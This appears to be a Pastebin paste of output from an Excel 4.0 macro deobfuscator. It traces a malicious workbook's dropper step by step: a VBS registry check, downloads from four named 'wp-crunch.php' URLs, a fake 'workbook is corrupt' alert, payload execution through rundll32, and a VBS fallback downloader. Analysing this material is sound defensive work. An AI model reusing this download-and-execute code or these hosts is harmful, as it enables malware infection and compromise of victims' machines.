  373. CELL:EK34931 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","Set JJ0Vlx = CreateObject(""Scripting.FileSystemObject"")")
  374. CELL:EK34932 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","Set KEPJk = JJ0Vlx.CreateTextFile(""C:\Users\Public\h9W.txt"", True)")
  375. CELL:EK34933 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","KEPJk.WriteLine(ggLxt.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  376. CELL:EK34934 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","KEPJk.Close")
  377. CELL:EK34935 , PartialEvaluation , FCLOSE("C:\Users\Public\Bcy75IXg.vbs")
  378. CELL:EK34936 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\Bcy75IXg.vbs")
  379. CELL:EK34937 , PartialEvaluation , WHILE(ISERROR(FILES(R34927C141)))
  380. CELL:EK34940 , PartialEvaluation , FILE.DELETE("C:\Users\Public\Bcy75IXg.vbs")
  381. CELL:EK34941 , FullEvaluation , FOPEN("C:\Users\Public\h9W.txt",2)
  382. CELL:EK34942 , PartialEvaluation , FREAD("C:\Users\Public\h9W.txt",100)
  383. CELL:EK34943 , PartialEvaluation , FCLOSE("C:\Users\Public\h9W.txt")
  384. CELL:EK34944 , PartialEvaluation , FILE.DELETE("C:\Users\Public\h9W.txt")
  385. CELL:EK34945 , FullBranching , IF(ISNUMBER(SEARCH("1",R34942C141)),GOTO(R34832C141),)
  386. CELL:EK34945 , FullEvaluation , [TRUE] GOTO(R34832C141)
  387. CELL:EK34832 , End , CLOSE(FALSE)
  388. CELL:EK34945 , FullEvaluation , [FALSE]
  389. CELL:EK34946 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R19560C173),GOTO(R24369C231))
  390. CELL:EK34946 , FullEvaluation , [TRUE] GOTO(R19560C173)
  391. CELL:FQ19560 , FullEvaluation , "=""C:\Users\Public\A95lG.html"""
  392. CELL:FQ19561 , FullEvaluation , "=""https://helpdallas.org/wp-crunch.php"""
  393. CELL:FQ19562 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36146C30,R36145C30,0,0)"
  394. CELL:FQ19563 , FullEvaluation , "=FILES(R36145C30)"
  395. CELL:FQ19564 , FullEvaluation , "=IF(ISERROR(R36148C30),GOTO(R36155C30),)"
  396. CELL:FQ19565 , FullEvaluation , "=FOPEN(R36145C30)"
  397. CELL:FQ19566 , FullEvaluation , "=FSIZE(R36150C30)"
  398. CELL:FQ19567 , FullEvaluation , "=FCLOSE(R36150C30)"
  399. CELL:FQ19568 , FullEvaluation , "=IF(R36151C30<40000,,GOTO(R36172C30))"
  400. CELL:FQ19569 , FullEvaluation , "=""https://designerremodeling.com/wp-crunch.php"""
  401. CELL:FQ19570 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36154C30,R36145C30,0,0)"
  402. CELL:FQ19571 , FullEvaluation , "=FILES(R36145C30)"
  403. CELL:FQ19572 , FullEvaluation , "=IF(ISERROR(R36156C30),GOTO(R36163C30),)"
  404. CELL:FQ19573 , FullEvaluation , "=FOPEN(R36145C30)"
  405. CELL:FQ19574 , FullEvaluation , "=FSIZE(R36158C30)"
  406. CELL:FQ19575 , FullEvaluation , "=FCLOSE(R36158C30)"
  407. CELL:FQ19576 , FullEvaluation , "=IF(R36159C30<40000,,GOTO(R36172C30))"
  408. CELL:FQ19577 , FullEvaluation , "=""https://healsoul.thememove.com/wp-crunch.php"""
  409. CELL:FQ19578 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36162C30,R36145C30,0,0)"
  410. CELL:FQ19579 , FullEvaluation , "=FILES(R36145C30)"
  411. CELL:FQ19580 , FullEvaluation , "=IF(ISERROR(R36164C30),GOTO(R36171C30),)"
  412. CELL:FQ19581 , FullEvaluation , "=FOPEN(R36145C30)"
  413. CELL:FQ19582 , FullEvaluation , "=FSIZE(R36166C30)"
  414. CELL:FQ19583 , FullEvaluation , "=FCLOSE(R36166C30)"
  415. CELL:FQ19584 , FullEvaluation , "=IF(R36167C30<40000,,GOTO(R36172C30))"
  416. CELL:FQ19585 , FullEvaluation , "=""https://septatechnology.com/wp-crunch.php"""
  417. CELL:FQ19586 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36170C30,R36145C30,0,0)"
  418. CELL:FQ19587 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  419. CELL:FQ19588 , FullEvaluation , "=ALERT(R36172C30)"
  420. CELL:FQ19589 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  421. CELL:FQ19590 , FullEvaluation , "=R36145C30&"",DllRegisterServer"""
  422. CELL:FQ19591 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R36174C30,R36175C30,0,5)"
  423. CELL:FQ19592 , FullEvaluation , "=GOTO(R34832C141)"
  424. CELL:FQ19593 , FullEvaluation , ON.TIME(2020-08-16 06:09:46.292383,'BgGIL5lfRvUbzqcAWl'!BV61639)
  425. CELL:BV61639 , FullEvaluation , FORMULA("=FORMULA(R[-42080]C[99],R[-25495]C[-44])",BgGIL5lfRvUbzqcAWl$BV$61640:$BV$61672)
  426. CELL:BV61640 , FullEvaluation , FORMULA("=""C:\Users\Public\A95lG.html""",R[-25495]C[-44])
  427. CELL:BV61641 , FullEvaluation , FORMULA("=""https://helpdallas.org/wp-crunch.php""",R[-25495]C[-44])
  428. CELL:BV61642 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36146C30,R36145C30,0,0)",R[-25495]C[-44])
  429. CELL:BV61643 , FullEvaluation , FORMULA("=FILES(R36145C30)",R[-25495]C[-44])
  430. CELL:BV61644 , FullEvaluation , FORMULA("=IF(ISERROR(R36148C30),GOTO(R36155C30),)",R[-25495]C[-44])
  431. CELL:BV61645 , FullEvaluation , FORMULA("=FOPEN(R36145C30)",R[-25495]C[-44])
  432. CELL:BV61646 , FullEvaluation , FORMULA("=FSIZE(R36150C30)",R[-25495]C[-44])
  433. CELL:BV61647 , FullEvaluation , FORMULA("=FCLOSE(R36150C30)",R[-25495]C[-44])
  434. CELL:BV61648 , FullEvaluation , FORMULA("=IF(R36151C30<40000,,GOTO(R36172C30))",R[-25495]C[-44])
  435. CELL:BV61649 , FullEvaluation , FORMULA("=""https://designerremodeling.com/wp-crunch.php""",R[-25495]C[-44])
  436. CELL:BV61650 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36154C30,R36145C30,0,0)",R[-25495]C[-44])
  437. CELL:BV61651 , FullEvaluation , FORMULA("=FILES(R36145C30)",R[-25495]C[-44])
  438. CELL:BV61652 , FullEvaluation , FORMULA("=IF(ISERROR(R36156C30),GOTO(R36163C30),)",R[-25495]C[-44])
  439. CELL:BV61653 , FullEvaluation , FORMULA("=FOPEN(R36145C30)",R[-25495]C[-44])
  440. CELL:BV61654 , FullEvaluation , FORMULA("=FSIZE(R36158C30)",R[-25495]C[-44])
  441. CELL:BV61655 , FullEvaluation , FORMULA("=FCLOSE(R36158C30)",R[-25495]C[-44])
  442. CELL:BV61656 , FullEvaluation , FORMULA("=IF(R36159C30<40000,,GOTO(R36172C30))",R[-25495]C[-44])
  443. CELL:BV61657 , FullEvaluation , FORMULA("=""https://healsoul.thememove.com/wp-crunch.php""",R[-25495]C[-44])
  444. CELL:BV61658 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36162C30,R36145C30,0,0)",R[-25495]C[-44])
  445. CELL:BV61659 , FullEvaluation , FORMULA("=FILES(R36145C30)",R[-25495]C[-44])
  446. CELL:BV61660 , FullEvaluation , FORMULA("=IF(ISERROR(R36164C30),GOTO(R36171C30),)",R[-25495]C[-44])
  447. CELL:BV61661 , FullEvaluation , FORMULA("=FOPEN(R36145C30)",R[-25495]C[-44])
  448. CELL:BV61662 , FullEvaluation , FORMULA("=FSIZE(R36166C30)",R[-25495]C[-44])
  449. CELL:BV61663 , FullEvaluation , FORMULA("=FCLOSE(R36166C30)",R[-25495]C[-44])
  450. CELL:BV61664 , FullEvaluation , FORMULA("=IF(R36167C30<40000,,GOTO(R36172C30))",R[-25495]C[-44])
  451. CELL:BV61665 , FullEvaluation , FORMULA("=""https://septatechnology.com/wp-crunch.php""",R[-25495]C[-44])
  452. CELL:BV61666 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R36170C30,R36145C30,0,0)",R[-25495]C[-44])
  453. CELL:BV61667 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[-25495]C[-44])
  454. CELL:BV61668 , FullEvaluation , FORMULA("=ALERT(R36172C30)",R[-25495]C[-44])
  455. CELL:BV61669 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[-25495]C[-44])
  456. CELL:BV61670 , FullEvaluation , FORMULA("=R36145C30&"",DllRegisterServer""",R[-25495]C[-44])
  457. CELL:BV61671 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R36174C30,R36175C30,0,5)",R[-25495]C[-44])
  458. CELL:BV61672 , FullEvaluation , FORMULA("=GOTO(R34832C141)",R[-25495]C[-44])
  459. CELL:BV61673 , FullEvaluation , ON.TIME(2020-08-16 06:09:46.324091,'BgGIL5lfRvUbzqcAWl'!AD36145)
  460. CELL:AD36145 , FullEvaluation , "C:\Users\Public\A95lG.html"
  461. CELL:AD36146 , FullEvaluation , "https://helpdallas.org/wp-crunch.php"
  462. CELL:AD36147 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://helpdallas.org/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  463. CELL:AD36148 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  464. CELL:AD36149 , FullBranching , IF(ISERROR(R36148C30),GOTO(R36155C30),)
  465. CELL:AD36149 , FullEvaluation , [TRUE] GOTO(R36155C30)
  466. CELL:AD36155 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://designerremodeling.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  467. CELL:AD36156 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  468. CELL:AD36157 , FullBranching , IF(ISERROR(R36156C30),GOTO(R36163C30),)
  469. CELL:AD36157 , FullEvaluation , [TRUE] GOTO(R36163C30)
  470. CELL:AD36163 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://healsoul.thememove.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  471. CELL:AD36164 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  472. CELL:AD36165 , FullBranching , IF(ISERROR(R36164C30),GOTO(R36171C30),)
  473. CELL:AD36165 , FullEvaluation , [TRUE] GOTO(R36171C30)
  474. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  475. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  476. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  477. CELL:AD36174 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  478. CELL:AD36175 , FullEvaluation , "C:\Users\Public\A95lG.html,DllRegisterServer"
  479. CELL:AD36176 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\A95lG.html,DllRegisterServer",0,5)
  480. CELL:AD36177 , FullEvaluation , GOTO(R34832C141)
  481. CELL:EK34832 , End , CLOSE(FALSE)
  482. CELL:AD36165 , FullEvaluation , [FALSE]
  483. CELL:AD36166 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  484. CELL:AD36167 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  485. CELL:AD36168 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  486. CELL:AD36169 , FullEvaluation , IF(R36167C30<40000,,GOTO(R36172C30))
  487. CELL:AD36170 , FullEvaluation , "https://septatechnology.com/wp-crunch.php"
  488. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  489. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  490. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  491. CELL:AD36174 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  492. CELL:AD36175 , FullEvaluation , "C:\Users\Public\A95lG.html,DllRegisterServer"
  493. CELL:AD36176 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\A95lG.html,DllRegisterServer",0,5)
  494. CELL:AD36177 , FullEvaluation , GOTO(R34832C141)
  495. CELL:EK34832 , End , CLOSE(FALSE)
  496. CELL:AD36157 , FullEvaluation , [FALSE]
  497. CELL:AD36158 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  498. CELL:AD36159 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  499. CELL:AD36160 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  500. CELL:AD36161 , FullEvaluation , IF(R36159C30<40000,,GOTO(R36172C30))
  501. CELL:AD36162 , FullEvaluation , "https://healsoul.thememove.com/wp-crunch.php"
  502. CELL:AD36163 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://healsoul.thememove.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  503. CELL:AD36164 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  504. CELL:AD36165 , FullBranching , IF(ISERROR(R36164C30),GOTO(R36171C30),)
  505. CELL:AD36165 , FullEvaluation , [TRUE] GOTO(R36171C30)
  506. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  507. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  508. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  509. CELL:AD36174 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  510. CELL:AD36175 , FullEvaluation , "C:\Users\Public\A95lG.html,DllRegisterServer"
  511. CELL:AD36165 , FullEvaluation , [FALSE]
  512. CELL:AD36166 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  513. CELL:AD36167 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  514. CELL:AD36168 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  515. CELL:AD36169 , FullEvaluation , IF(R36167C30<40000,,GOTO(R36172C30))
  516. CELL:AD36170 , FullEvaluation , "https://septatechnology.com/wp-crunch.php"
  517. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  518. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  519. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  520. CELL:AD36149 , FullEvaluation , [FALSE]
  521. CELL:AD36150 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  522. CELL:AD36151 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  523. CELL:AD36152 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  524. CELL:AD36153 , FullEvaluation , IF(R36151C30<40000,,GOTO(R36172C30))
  525. CELL:AD36154 , FullEvaluation , "https://designerremodeling.com/wp-crunch.php"
  526. CELL:AD36155 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://designerremodeling.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  527. CELL:AD36156 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  528. CELL:AD36157 , FullBranching , IF(ISERROR(R36156C30),GOTO(R36163C30),)
  529. CELL:AD36157 , FullEvaluation , [TRUE] GOTO(R36163C30)
  530. CELL:AD36163 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://healsoul.thememove.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  531. CELL:AD36164 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  532. CELL:AD36165 , FullBranching , IF(ISERROR(R36164C30),GOTO(R36171C30),)
  533. CELL:AD36165 , FullEvaluation , [TRUE] GOTO(R36171C30)
  534. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  535. CELL:AD36165 , FullEvaluation , [FALSE]
  536. CELL:AD36166 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  537. CELL:AD36167 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  538. CELL:AD36168 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  539. CELL:AD36169 , FullEvaluation , IF(R36167C30<40000,,GOTO(R36172C30))
  540. CELL:AD36170 , FullEvaluation , "https://septatechnology.com/wp-crunch.php"
  541. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  542. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  543. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  544. CELL:AD36157 , FullEvaluation , [FALSE]
  545. CELL:AD36158 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  546. CELL:AD36159 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  547. CELL:AD36160 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  548. CELL:AD36161 , FullEvaluation , IF(R36159C30<40000,,GOTO(R36172C30))
  549. CELL:AD36162 , FullEvaluation , "https://healsoul.thememove.com/wp-crunch.php"
  550. CELL:AD36163 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://healsoul.thememove.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  551. CELL:AD36164 , PartialEvaluation , FILES("C:\Users\Public\A95lG.html")
  552. CELL:AD36165 , FullBranching , IF(ISERROR(R36164C30),GOTO(R36171C30),)
  553. CELL:AD36165 , FullEvaluation , [FALSE]
  554. CELL:AD36166 , FullEvaluation , FOPEN("C:\Users\Public\A95lG.html",1)
  555. CELL:AD36167 , PartialEvaluation , FSIZE("C:\Users\Public\A95lG.html")
  556. CELL:AD36168 , PartialEvaluation , FCLOSE("C:\Users\Public\A95lG.html")
  557. CELL:AD36169 , FullEvaluation , IF(R36167C30<40000,,GOTO(R36172C30))
  558. CELL:AD36170 , FullEvaluation , "https://septatechnology.com/wp-crunch.php"
  559. CELL:AD36171 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://septatechnology.com/wp-crunch.php","C:\Users\Public\A95lG.html",0,0)
  560. CELL:AD36172 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  561. CELL:AD36173 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  562. CELL:EK34946 , FullEvaluation , [FALSE] GOTO(R24369C231)
  563. CELL:HW24369 , FullEvaluation , "=""C:\Users\Public\BrGcon8.html"""
  564. CELL:HW24370 , FullEvaluation , "=""C:\Users\Public\e1oC.vbs"""
  565. CELL:HW24371 , FullEvaluation , "=FOPEN(R27791C156,3)"
  566. CELL:HW24372 , FullEvaluation , "=FWRITELN(R27792C156,""FNJ = """"https://helpdallas.org/wp-crunch.php"""""")"
  567. CELL:HW24373 , FullEvaluation , "=FWRITELN(R27792C156,""wTQ0Dh = """"https://designerremodeling.com/wp-crunch.php"""""")"
  568. CELL:HW24374 , FullEvaluation , "=FWRITELN(R27792C156,""Ys5EI = """"https://healsoul.thememove.com/wp-crunch.php"""""")"
  569. CELL:HW24375 , FullEvaluation , "=FWRITELN(R27792C156,""wFqUsnj = """"https://septatechnology.com/wp-crunch.php"""""")"
  570. CELL:HW24376 , FullEvaluation , "=FWRITELN(R27792C156,""SaNy56z = Array(FNJ,wTQ0Dh,Ys5EI,wFqUsnj)"")"
  571. CELL:HW24377 , FullEvaluation , "=FWRITELN(R27792C156,""Dim tf4f: Set tf4f = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  572. CELL:HW24378 , FullEvaluation , "=FWRITELN(R27792C156,""Function oxMpk(data):"")"
  573. CELL:HW24379 , FullEvaluation , "=FWRITELN(R27792C156,""tf4f.setOption(2) = 13056"")"
  574. CELL:HW24380 , FullEvaluation , "=FWRITELN(R27792C156,""tf4f.Open """"GET"""", data, False"")"
  575. CELL:HW24381 , FullEvaluation , "=FWRITELN(R27792C156,""tf4f.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  576. CELL:HW24382 , FullEvaluation , "=FWRITELN(R27792C156,""tf4f.Send"")"
  577. CELL:HW24383 , FullEvaluation , "=FWRITELN(R27792C156,""oxMpk = tf4f.Status"")"
  578. CELL:HW24384 , FullEvaluation , "=FWRITELN(R27792C156,""End Function"")"
  579. CELL:HW24385 , FullEvaluation , "=FWRITELN(R27792C156,""For Each tHIt8 in SaNy56z"")"
  580. CELL:HW24386 , FullEvaluation , "=FWRITELN(R27792C156,""If oxMpk(tHIt8) = 200 Then"")"
  581. CELL:HW24387 , FullEvaluation , "=FWRITELN(R27792C156,""Dim xiGB: Set xiGB = CreateObject(""""ADODB.Stream"""")"")"
  582. CELL:HW24388 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.Open"")"
  583. CELL:HW24389 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.Type = 1"")"
  584. CELL:HW24390 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.Write tf4f.ResponseBody"")"
  585. CELL:HW24391 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.SaveToFile """"""&R27790C156&"""""", 2"")"
  586. CELL:HW24392 , FullEvaluation , "=FWRITELN(R27792C156,""xiGB.Close"")"
  587. CELL:HW24393 , FullEvaluation , "=FWRITELN(R27792C156,""Exit For"")"
  588. CELL:HW24394 , FullEvaluation , "=FWRITELN(R27792C156,""End If"")"
  589. CELL:HW24395 , FullEvaluation , "=FWRITELN(R27792C156,""Next"")"
  590. CELL:HW24396 , FullEvaluation , "=FCLOSE(R27792C156)"
  591. CELL:HW24397 , FullEvaluation , "=EXEC(""explorer.exe ""&R27791C156&"""")"
  592. CELL:HW24398 , FullEvaluation , "=WHILE(ISERROR(FILES(R27790C156)))"
  593. CELL:HW24399 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  594. CELL:HW24400 , FullEvaluation , "=NEXT()"
  595. CELL:HW24401 , FullEvaluation , "=FILE.DELETE(R27791C156)"
  596. CELL:HW24402 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  597. CELL:HW24403 , FullEvaluation , "=""C:\Users\Public\ieLs.vbs"""
  598. CELL:HW24404 , FullEvaluation , "=FOPEN(R27824C156,3)"
  599. CELL:HW24405 , FullEvaluation , "=""rundll32.exe"""
  600. CELL:HW24406 , FullEvaluation , "=R27790C156&"",DllRegisterServer"""
  601. CELL:HW24407 , FullEvaluation , "=""C:\Windows\System32"""
  602. CELL:HW24408 , FullEvaluation , "=FWRITELN(R27825C156,""Set Ujjwj4C = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  603. CELL:HW24409 , FullEvaluation , "=FWRITELN(R27825C156,""Ujjwj4C.Document.Application.ShellExecute """"""&R27826C156&"""""",""""""&R27827C156&"""""",""""""&R27828C156&"""""",Null,0"")"
  604. CELL:HW24410 , FullEvaluation , "=FCLOSE(R27825C156)"
  605. CELL:HW24411 , FullEvaluation , "=EXEC(""explorer.exe ""&R27824C156&"""")"
  606. CELL:HW24412 , FullEvaluation , "=GOTO(R34832C141)"
  607. CELL:HW24413 , FullEvaluation , ON.TIME(2020-08-16 06:09:46.927331,'BgGIL5lfRvUbzqcAWl'!AA58589)
  608. CELL:AA58589 , FullEvaluation , FORMULA("=FORMULA(R[-34221]C[204],R[-30800]C[129])",BgGIL5lfRvUbzqcAWl$BV$61640:$BV$61672)
  609. CELL:AA58634 , FullEvaluation , ON.TIME(2020-08-16 06:09:46.927331,None)
  610. CELL:AA58635 , FullEvaluation , RETURN()
  611. CELL:EK34925 , FullEvaluation , [FALSE] GOTO(R34832C141)
  612. CELL:EK34832 , End , CLOSE(FALSE)
  613.  
  614. Files:
  615.  
  616. Files: path C:\Users\Public\Bcy75IXg.vbs, access 3
  617. On Error Resume Next
  618. Set ggLxt = CreateObject("WScript.Shell")
  619. Set JJ0Vlx = CreateObject("Scripting.FileSystemObject")
  620. Set KEPJk = JJ0Vlx.CreateTextFile("C:\Users\Public\h9W.txt", True)
  621. KEPJk.WriteLine(ggLxt.RegRead("HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings"))
  622. KEPJk.Close
  623.  
  624.  
  625. [END of Deobfuscation]
  626. time elapsed: 17.231865644454956
  627.  
  628. Process finished with exit code 0
  629.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!